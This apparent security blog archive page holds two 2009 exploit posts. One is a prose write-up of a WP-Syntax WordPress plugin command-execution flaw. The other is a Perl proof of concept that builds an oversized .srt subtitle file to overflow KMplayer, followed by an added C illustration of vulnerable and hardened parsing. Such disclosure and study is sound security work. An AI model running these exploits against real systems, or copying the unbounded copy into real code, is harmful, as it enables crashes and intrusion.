Archive

Posts tagged ‘PoC’

WordPress Plugin WP-Syntax <= 0.9.1 Remote Command Execution PoC

August 15, 2009 | No comments | 85 views

============================================================
WordPress Plugin WP-Syntax <= 0.9.1 Remote Command Execution
============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

WP-Syntax is the most popular WordPress plugin for highlighting code. It is used on many sites; Stefan Esser, for example, uses it on his blog. The plugin caught my interest because I found it on the blog of a fairly large pharma affiliate program. After analysing the source code I found a rather unusual vulnerability, so I decided to write it up as a separate topic. Perhaps someone has comments or ideas about a more elegant solution.

WP-Syntax uses the GeSHi library, which implements all of the syntax parsing and the generation of the matching HTML for each language. After looking through the plugin's main script, wp-syntax.php, I moved on to the test folder, which holds two scripts: index.php and code.php. code.php contains code samples for various languages and passes them to index.php for highlighting, to demonstrate what the plugin can do. index.php includes wp-syntax.php, which in turn includes geshi.php. Since wp-syntax.php is meant to be called only in the context of WP, while test/index.php can be run independently of the platform, the author decided to use a home-made imitation of the WP mechanism for registering and invoking callback functions. Anyone familiar with WP internals, or who has at least seen part of its code, will understand that I am talking about functions such as add_action(), do_action(), apply_filters(), and so on.
Read more...

Category: 矩阵毒刺

KMplayer <= 2.9.4.1433 (.srt File) Local Buffer Overflow PoC

July 22, 2009 | No comments | 54 views

#!/usr/bin/perl
######################## In The Name Of Allah ####################
#
# The KMplayer (.Srt) File Local Bof Poc
#
#
#Author : b3hz4d (Seyed Behzad Shaghasemi)
#Site : Www.Pentesters.Ir
#Tested on KMplayer <= 2.9.4.1433
#Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad and all members in Pentesters.ir
#Greetings : Shahriyar && Alireza && Soroush and all iranian hackers
#
######################### Www.Pentesters.Ir ######################

use strict;
use warnings;

# Oversized subtitle text: 90000 'A' bytes placed in the text line of the
# first cue. Opening the resulting .srt in the player triggers the overflow.
my $junk = "A" x 90000;

open(my $fh, '>', 'SubTitle.srt') or die "Cannot create SubTitle.srt: $!";

# Each cue is written as: index, timing line, text line, second text line.
# Cue 1 carries the payload; cues 2-6 are ordinary filler entries.
print $fh "1"."\n"."00:00:25,100 --> 00:00:30,900"."\n"."$junk\n"."-pentesters\n";
print $fh "2"."\n"."00:00:31,100 --> 00:00:35,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print $fh "3"."\n"."00:00:36,100 --> 00:00:40,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print $fh "4"."\n"."00:00:41,100 --> 00:00:45,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print $fh "5"."\n"."00:00:46,100 --> 00:00:50,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print $fh "6"."\n"."00:00:51,100 --> 00:00:55,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";

close($fh) or die "Cannot close SubTitle.srt: $!";

# milw0rm.com [2009-07-20]
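The defect class this PoC exercises is a subtitle text line longer than the fixed-size buffer the parser copies it into. The C program below is an added illustration and is not KMPlayer's code: it is a hypothetical SRT cue parser with a 256-byte text buffer, written once with an unbounded copy (the pattern a 90000-byte line overruns) and once with a bounded copy that rejects the oversized line, both fed a constructed cue in the same layout the Perl script writes. The buffer size, struct layout and function names are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TEXT_MAX 256 /* hypothetical fixed-size buffer for one subtitle text line */

struct cue {
    int  index;
    char start[16];
    char end[16];
    char text[TEXT_MAX];
};

/* Copy one line (up to '\n') from *p into dst and advance *p past it.
 * Returns the line length, or -1 if it would not fit (including the NUL). */
static int take_line(const char **p, char *dst, size_t dst_size)
{
    const char *nl = strchr(*p, '\n');
    size_t len = nl ? (size_t)(nl - *p) : strlen(*p);
    if (len + 1 > dst_size)
        return -1;
    memcpy(dst, *p, len);
    dst[len] = '\0';
    *p += len + (nl ? 1 : 0);
    return (int)len;
}

/* Parse the index line and the timing line shared by both variants. */
static int parse_header(const char **p, struct cue *out)
{
    char line[32];
    if (take_line(p, line, sizeof line) < 0) return -1;
    out->index = atoi(line);
    if (take_line(p, line, sizeof line) < 0) return -1;
    if (sscanf(line, "%15s --> %15s", out->start, out->end) != 2) return -1;
    return 0;
}

/* Vulnerable pattern: the text line is copied with no bound check, so a
 * 90000-byte line like the one the PoC writes overruns out->text.
 * Present only to show the defect; do not call it on untrusted input. */
int parse_cue_unsafe(const char *src, struct cue *out)
{
    if (parse_header(&src, out) < 0) return -1;
    const char *nl = strchr(src, '\n');
    size_t len = nl ? (size_t)(nl - src) : strlen(src);
    memcpy(out->text, src, len);   /* len is never compared with TEXT_MAX */
    out->text[len] = '\0';
    return 0;
}

/* Hardened form: the text line goes through the same bounded copy as the
 * header lines, and an oversized line is rejected rather than truncated. */
int parse_cue_safe(const char *src, struct cue *out)
{
    if (parse_header(&src, out) < 0) return -1;
    if (take_line(&src, out->text, sizeof out->text) < 0)
        return -1;
    return 0;
}

/* Build a cue in the PoC's layout with a text line of text_len 'A' bytes.
 * Constructed input for this example; the caller frees the result. */
char *make_cue(size_t text_len)
{
    const char *head = "1\n00:00:25,100 --> 00:00:30,900\n";
    const char *tail = "\n-pentesters\n";
    size_t hl = strlen(head), tl = strlen(tail);
    char *buf = malloc(hl + text_len + tl + 1);
    if (!buf) return NULL;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', text_len);
    memcpy(buf + hl + text_len, tail, tl + 1);
    return buf;
}

/* Run the hardened parser on a constructed cue: 0 = parsed, -1 = rejected. */
int check_safe(size_t text_len, struct cue *out)
{
    char *src = make_cue(text_len);
    if (!src) return -1;
    int rc = parse_cue_safe(src, out);
    free(src);
    return rc;
}

int main(void)
{
    struct cue c;
    printf("10-byte text line:    %s\n", check_safe(10, &c) == 0 ? "parsed" : "rejected");
    printf("90000-byte text line: %s\n", check_safe(90000, &c) == 0 ? "parsed" : "rejected");
    return 0;
}
```

The hardened parser fails closed: a line that does not fit is reported as an error instead of being silently cut, which keeps a malformed file from being half-loaded while still refusing the overflow.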

Category: 矩阵毒刺